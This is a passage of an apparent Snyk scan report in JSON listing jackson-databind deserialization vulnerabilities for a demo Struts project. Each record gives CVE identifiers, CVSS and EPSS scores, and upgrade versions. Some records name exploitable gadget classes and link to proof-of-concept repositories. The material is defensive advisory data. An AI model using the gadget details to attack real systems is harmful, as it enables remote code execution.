JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", 
+ "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", 
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": 
"https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + 
{ + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": 
"ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose 
data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a 